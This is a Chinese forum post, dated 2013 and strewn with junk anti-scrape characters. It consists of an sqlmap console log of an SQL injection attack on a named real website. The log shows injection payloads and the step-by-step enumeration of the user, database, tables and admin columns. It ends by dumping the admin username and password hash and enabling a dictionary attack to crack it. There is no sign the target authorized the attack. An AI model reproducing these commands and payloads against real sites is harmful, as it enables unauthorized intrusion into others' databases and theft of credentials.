D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# u9 V! G2 L! ?9 O4 r7 E
ms "Mysql" --current-user /* 注解:获取当前用户名称
. I$ h5 s. a' E! F1 a- _" {. X$ v) V sqlmap/0.9 - automatic SQL injection and database takeover tool3 _$ r7 S+ S( d. T
http://sqlmap.sourceforge.net starting at: 16:53:54/ o2 q7 ], t2 L; W7 O# [- I
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 N+ |& S. v3 @& E
session file
* r6 I+ y) R, [/ u* u( u4 Z[16:53:54] [INFO] resuming injection data from session file. S, n- ~2 H. K
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* \) U4 L7 J3 {! ?6 I
[16:53:54] [INFO] testing connection to the target url
) T+ t0 [4 D0 L$ V# x2 Osqlmap identified the following injection points with a total of 0 HTTP(s) reque
3 T+ R4 G& B) X8 }7 nsts:/ Z- X3 G* m1 s: K, N" M6 |
---" n5 S* R6 Q- K# C+ R' u4 Z
Place: GET1 G/ s/ _ H# k# `$ X+ u
Parameter: id
$ g# @( X% X8 H Type: boolean-based blind0 ?# N) B% d0 ~5 W( }' a- v
Title: AND boolean-based blind - WHERE or HAVING clause
, V* g( m; `5 c, r% E Payload: id=276 AND 799=799" M( D; ^& i8 f1 S5 z
Type: error-based; u9 _! w0 n9 u+ N1 E) P
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
`. d, {2 z% }/ d Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; H" k0 c* T8 v1 Z3 W6 @) T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- i r% M: y+ L- x( T* l; L),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)( g# v2 M2 \) V7 C* g2 [
Type: UNION query
+ C) a+ @7 C; g x& L9 N8 u6 F, Y Title: MySQL UNION query (NULL) - 1 to 10 columns
! q$ I; a* p: C5 O2 G Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 T3 v9 d1 v b. R4 H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
' _6 W0 X% A1 @& |8 ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* J; _" b: B& ^4 u# A0 v Type: AND/OR time-based blind8 w: `4 @7 l, @. ~
Title: MySQL > 5.0.11 AND time-based blind7 ^7 R: x) W# p# b: D- ]8 n
Payload: id=276 AND SLEEP(5)0 V4 k: ^, @# f
---# b/ L2 Y; C0 B
[16:53:55] [INFO] the back-end DBMS is MySQL0 k( d1 N1 a& q0 p# y1 t% i$ E9 p! p
web server operating system: Windows6 T+ m- B7 d6 `: h5 }
web application technology: Apache 2.2.11, PHP 5.3.0+ B% Y$ R m" }! n# t- q j2 ~
back-end DBMS: MySQL 5.0
4 C9 b) h+ J) b[16:53:55] [INFO] fetching current user9 m3 A1 m |% ~" y u
current user: 'root@localhost'
) Q' Y& i# \% ]) w H[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou: X$ Z6 d* F; {
tput\www.wepost.com.hk' shutting down at: 16:53:586 |) t+ g; h4 O& _4 M: J- z
1 p! F+ @ c/ I: c
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db {/ _" X. u) V) S
ms "Mysql" --current-db /*当前数据库: F4 z" j. Q* X
sqlmap/0.9 - automatic SQL injection and database takeover tool
E7 `( q& B- c0 W5 ^5 ]5 _6 V http://sqlmap.sourceforge.net starting at: 16:54:16; J9 B1 K8 ~4 n( A0 |
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
; ]3 V$ A4 u$ P% G! L session file
2 C. v" i1 }# R2 E2 J) x[16:54:16] [INFO] resuming injection data from session file
& L6 |+ _$ S {, Y, g3 y( W# u) M[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* T' A* c. {8 Y! J" q4 W' g[16:54:16] [INFO] testing connection to the target url1 h/ I" }1 l, |; D8 Y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
O+ J7 Q3 A5 g( N3 f, \sts:0 @; c/ p* E% v" T1 \& _" H: k* B
---
4 ?9 l% @" J2 E+ }+ R4 mPlace: GET( ?' w7 ^. `+ X0 z: Z
Parameter: id9 Q2 T @, u; l) y' _9 L
Type: boolean-based blind
% j1 @' @6 R: w/ u; Y Title: AND boolean-based blind - WHERE or HAVING clause
* |1 Z- S4 N8 ^' C: R Payload: id=276 AND 799=799
( b" M2 R- {7 s! o$ @, } Type: error-based% s, c- |4 c' i# N( \. o
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 [6 K* W+ j) z+ @7 ?
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& f1 H; ~! Q! p* ^6 X# W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ d5 {) K% R1 c5 X, R0 n, B3 T( E# o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& k g2 i: _6 M( _8 M8 z, @# | Type: UNION query8 {; o" q" }3 q2 N% R
Title: MySQL UNION query (NULL) - 1 to 10 columns8 X v; R4 g* C
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ s$ y& \# G1 q2 }1 h* V* t# t" C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 a) N0 b4 M" E1 [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- W; y( a+ N+ t) w
Type: AND/OR time-based blind5 W, H1 B& J: H/ w' J! w0 S/ e
Title: MySQL > 5.0.11 AND time-based blind4 Q1 n$ N# ~2 N" F# T
Payload: id=276 AND SLEEP(5)
2 \' }2 J2 u: \ f5 m* h---
- L/ w3 K! u- w3 X7 B1 Z[16:54:17] [INFO] the back-end DBMS is MySQL
4 O( \" V* N# L8 Tweb server operating system: Windows
5 e. q8 Z& h! ~. w' t. q& A% Hweb application technology: Apache 2.2.11, PHP 5.3.0* @+ V: s, d- c" r
back-end DBMS: MySQL 5.0
& b# v! C/ X* x0 \, O% q[16:54:17] [INFO] fetching current database& ]8 V- N8 u! P8 ?. k
current database: 'wepost'4 w3 G$ N( h$ x8 b( F! p" r+ N
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou/ f/ D/ R8 j( m9 [
tput\www.wepost.com.hk' shutting down at: 16:54:18
' S0 `+ w) [! @, y7 PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, Q" X7 J# z0 ~8 X: [5 T% \
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
/ ~: t) O2 `1 ^9 F# P3 b sqlmap/0.9 - automatic SQL injection and database takeover tool
6 m! k( ]; b' y7 N5 s H8 C http://sqlmap.sourceforge.net starting at: 16:55:25
4 N/ E. A( k+ B+ B. }[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as* ?2 F: \2 G& {5 M: g' f
session file
( `% l0 B) C V+ Z5 }' N' n[16:55:25] [INFO] resuming injection data from session file& j$ @. p4 Q6 j' e. j. V% f
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file( B3 w# l# k( }
[16:55:25] [INFO] testing connection to the target url
$ T# \6 {7 u5 G* Csqlmap identified the following injection points with a total of 0 HTTP(s) reque5 R- ]+ N! E2 R
sts:# ]1 R( `* @- y0 Q6 s
---
; B& d( Z, [ M$ m; P9 U1 }Place: GET6 W) H2 E8 _) M
Parameter: id/ M" _$ _. c/ ?: b/ @# Q
Type: boolean-based blind
9 \9 k3 P* |4 ?9 \ Title: AND boolean-based blind - WHERE or HAVING clause: ?, P, |* C# _
Payload: id=276 AND 799=799, _: @/ y' y# z
Type: error-based6 m* v: I+ B/ D: w* \5 b; Y
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% C t% u5 n) g/ x: p+ _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ g6 j! k% [( A( m, \% N$ ]
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, G5 U9 m7 C( c) `: x/ F, u' T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ j& t/ w& ^6 } E7 ^% F
Type: UNION query
" f9 L' q5 z5 n) J( A Title: MySQL UNION query (NULL) - 1 to 10 columns: A7 o/ x$ e2 o, p8 l# }1 I. E
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! S N+ j7 R; _, y, F. F9 ~6 J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 Q7 H* V/ V$ q! ~6 E n; `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) T& i, F4 t8 _2 a1 p
Type: AND/OR time-based blind; }8 l+ K' q7 `" O
Title: MySQL > 5.0.11 AND time-based blind
- W# n/ W. L5 T& L Payload: id=276 AND SLEEP(5)
' O" j# j; |! o3 b$ ]) Z4 o---. l2 J/ {# e5 n. o0 ~
[16:55:26] [INFO] the back-end DBMS is MySQL3 D) f% [2 v0 s$ f8 d6 O9 ?1 J
web server operating system: Windows& u* u: ^5 U& I9 L7 [' H8 t1 ~6 b
web application technology: Apache 2.2.11, PHP 5.3.0
, Q6 y3 P0 R0 N1 w. ^/ M; |back-end DBMS: MySQL 5.0
$ \5 ~8 k) i2 M[16:55:26] [INFO] fetching tables for database 'wepost'
6 D" d/ Y( D$ m( S" r[16:55:27] [INFO] the SQL query used returns 6 entries; y3 R9 H2 [: K3 p3 C S! M0 a
Database: wepost& b) u; H3 k( t# b$ e1 c6 d
[6 tables]
# ~7 [! P k! r5 C. s/ [+-------------+0 \9 o& a2 ~& e! n; N8 T
| admin |
+ X; l' ^3 a% j+ i4 d| article |
1 e! R2 R# S& [0 y- a& S8 h8 A7 i| contributor |
+ o9 E6 l) @ _| idea |6 w6 c* \6 g# Z( M4 k" Q$ z) M( ]
| image |
9 d" Y4 u* h& Q' K' R. z% B, V| issue |, r3 X4 Y) J3 m1 m& a
+-------------+
; D) n1 G+ E8 N[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; b+ ]; |# h, @) n
tput\www.wepost.com.hk' shutting down at: 16:55:332 @& F0 E5 O9 H- l, W+ m
6 {! g$ l3 e& W( e- g8 `, q; G0 c
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 j" y1 L0 Q9 ~( f9 B0 E3 ?# g) ?ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名) }* y4 J9 k$ W8 { z% }" M
sqlmap/0.9 - automatic SQL injection and database takeover tool
* Q7 q, x+ p+ Q2 y" ^: S, b9 \ http://sqlmap.sourceforge.net starting at: 16:56:063 x0 R4 B8 O! s+ \- O$ Z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
( G ^: T7 |" O5 T. k4 Ests:7 g/ [4 H& N8 q# P* Z- i* j- |. M6 Y
---8 i% _* B$ U5 D) N% ]# A9 e
Place: GET$ F7 }) L8 W% _4 c" T$ A# o. ?
Parameter: id/ b) C* U; c1 I7 _; R& _
Type: boolean-based blind6 H1 I8 j7 B* j/ L5 E$ v
Title: AND boolean-based blind - WHERE or HAVING clause( d- w O# W$ E5 v
Payload: id=276 AND 799=799
; Q5 a! D$ i4 r8 D- h9 Z! K2 E9 W9 E Type: error-based
7 t$ v" x l: f8 ?; q* v9 K( s3 y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ N1 l- p/ O6 U2 D m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( i" H- s1 T7 Y+ J8 s( @
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! ?4 N; o5 r2 [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! b, I. W3 L1 W7 ^ Type: UNION query
; Z" c. h( E2 G7 k& M Title: MySQL UNION query (NULL) - 1 to 10 columns
7 B- \9 U# C z( ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( Q7 c$ {2 \. c; R( d
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. j/ b) M% _% Z. ]( x
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 z% W* r8 A$ m
Type: AND/OR time-based blind
3 ` k5 V0 {$ _$ @2 f; s4 f: m Title: MySQL > 5.0.11 AND time-based blind
% t7 k% m) W) U; P' U2 q Payload: id=276 AND SLEEP(5)& d5 s& D& O! V1 a
---
1 V. ^" m- G: w" e6 t' zweb server operating system: Windows
3 O" g% `9 o1 l, p) b6 jweb application technology: Apache 2.2.11, PHP 5.3.0! J4 Y& b4 j( G4 i5 J) ]% X
back-end DBMS: MySQL 5.0& r4 W3 L% d0 T+ b* |' E; S
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se3 X3 z F, F: T6 ]; K$ s( O' o
ssion': wepost, wepost7 x6 @0 M+ |$ Z- m& v% k: g' T
Database: wepost& U9 Z) r7 D. o) P4 i3 e* w
Table: admin+ @. i) N0 n8 a/ P* N+ |
[4 columns]" w {+ S/ I M$ T- P+ d1 N9 X/ R
+----------+-------------+
5 K, P# f2 T! a }8 I) `| Column | Type |5 |, v$ J. J0 v+ l
+----------+-------------+" [& r; c: z' `
| id | int(11) |
; l& m$ ^; p5 z7 u7 V| password | varchar(32) |
! w4 }! R6 m: r' m| type | varchar(10) |7 }; r) f5 n w# H6 h2 n8 d
| userid | varchar(20) |# \8 O- M5 [4 g7 l1 o
+----------+-------------+
0 S0 v/ z7 F" c% V shutting down at: 16:56:19
( v; H- _9 v7 o# m" F9 q) ?& B- a( A2 y4 n Z2 ]4 ~" T: l2 z
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; l! g4 `5 G, R3 D1 @9 ]
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容; [# T* T% P' X3 e
sqlmap/0.9 - automatic SQL injection and database takeover tool* Z+ M' i: [1 M5 {1 o6 k
http://sqlmap.sourceforge.net starting at: 16:57:14
" L$ m$ \9 B" ]sqlmap identified the following injection points with a total of 0 HTTP(s) reque' n0 ^! ^" w J( e# N
sts:
9 z |% j% L5 O2 a8 C. _! e. ?---
/ r4 |4 Y( U& O5 G9 `% H. yPlace: GET9 m, f) h& ]) _; [- ]* J
Parameter: id
9 \/ x; ~3 e# n7 s; y% z1 [% Z1 ` Type: boolean-based blind
* z* w I* ^4 m Title: AND boolean-based blind - WHERE or HAVING clause
4 A# F0 Q( h6 ~6 l1 B Payload: id=276 AND 799=7994 s) [$ n, @& R, u" e( B
Type: error-based
, W' ^+ l w0 d# b: Z6 C Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
* [! v5 S3 `% x8 ^* D. Q. r Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ U1 i( ]; w. G+ g5 Q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% A d8 Q+ d" f4 ~, H),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 x/ O) W. F2 [
Type: UNION query
, |' O! r& D6 \/ } Title: MySQL UNION query (NULL) - 1 to 10 columns, u, X( H; d% c3 Z$ Q; C
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; G& U" g5 `" W2 h$ t0 l7 I
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 Q; @* c; M8 ]5 y) |* J
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 }2 v8 D H s Type: AND/OR time-based blind2 n6 W9 Z" V4 [/ a: H
Title: MySQL > 5.0.11 AND time-based blind
' {3 E: H% J( b Payload: id=276 AND SLEEP(5)8 z% S+ x# [" u; v0 p. {5 k2 A
---
& K- O8 K3 i- J/ I; k5 j- bweb server operating system: Windows
3 h" J ^4 T) H6 k( m3 Zweb application technology: Apache 2.2.11, PHP 5.3.0
5 s/ z3 t& h4 ~9 y4 W8 jback-end DBMS: MySQL 5.0) G+ E1 d0 t q1 R" M
recognized possible password hash values. do you want to use dictionary attack o
: T& ]/ Y7 K: J% _: cn retrieved table items? [Y/n/q] y1 ^: X6 S! `0 g9 k3 I1 t
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
. H0 \2 U* g& fdo you want to use common password suffixes? (slow!) [y/N] y
- f! y8 n! `- l7 k6 g, A& H2 `Database: wepost9 r( h# G3 z# E4 j9 g; ~6 N
Table: admin& r, ?, Z5 v, \" g# P$ e
[1 entry]* `5 i) z# Y& ~7 f: A
+----------------------------------+------------+
4 A% X" U# f) s( ^/ K/ W| password | userid |
5 F7 J2 {: {! b/ Z) P# z6 q+----------------------------------+------------+5 y( q, G( F7 ^ N+ g
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" }2 ?' B3 z( ^( M1 a& `
+----------------------------------+------------+
3 z. ^, x) }# u1 ~$ L+ i4 o* q4 [ shutting down at: 16:58:14
; _3 u7 v( z: A* ^+ l g, d0 |, S j1 ^5 q' [. v
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对